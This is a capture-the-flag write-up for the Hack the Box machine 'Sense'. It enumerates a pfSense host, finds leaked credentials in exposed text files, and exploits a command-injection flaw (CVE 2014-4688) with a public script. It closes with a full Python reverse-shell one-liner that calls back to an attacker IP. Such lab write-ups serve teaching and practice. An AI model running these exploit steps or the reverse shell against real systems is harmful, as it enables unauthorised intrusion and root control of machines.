Sense
Writeup for Sense from Hack the Box

Service Enumeration

nmapAutomator.sh -H 10.10.10.60 -t all
There is a web service running on standard ports.
It turns out to be a pfSense login page.
The initial subdirectory enumeration did not yield anything interesting. If we look for .txt and .php files, however, we find some more interesting files.
gobuster dir -u https://10.10.10.60 -w /usr/share/dirb/wordlists/common.txt -x .txt,.php -k
The PHP pages will load the login page.
However, we find a changelog.txt:
1
# Security Changelog
2
3
### Issue
4
There was a failure in updating the firewall. Manual patching is therefore required
5
6
### Mitigated
7
2 of 3 vulnerabilities have been patched.
8
9
### Timeline
10
The remaining patches will be installed during the next maintenance window
Copied!
Using a longer wordlist, /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt, we find another .txt file.
1
####Support ticket###
2
3
Please create the following user
4
5
6
username: Rohit
7
password: company defaults
Copied!

Exploitation

The default credentials, admin:pfsense do not work. However, the system-users.txt file above indicated that a Rohit username exists, with a "company default" password.
Using the credentials rohit:pfsense, we successfully authenticate into the web application.
Here, we get more information on the system version.
This version is vulnerable to CVE 2014-4688, a command injection vulnerability.
Using code from https://github.com/spencerdodd/pfsense-code-exec/blob/master/pfsense_exec.py, we can exploit the vulnerability.
Change the configuration to suit our needs:
1
username = "rohit"
2
password = "pfsense"
3
listener_ip = "10.10.14.23"
4
listener_port = "4444"
5
target_ip = "10.10.10.60"
Copied!
The service is running as root, so we get a root shell.
To upgrade to an interactive shell, we can catch the Python reverse shell on another terminal:
export RHOST="10.10.14.23";export RPORT=4242;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'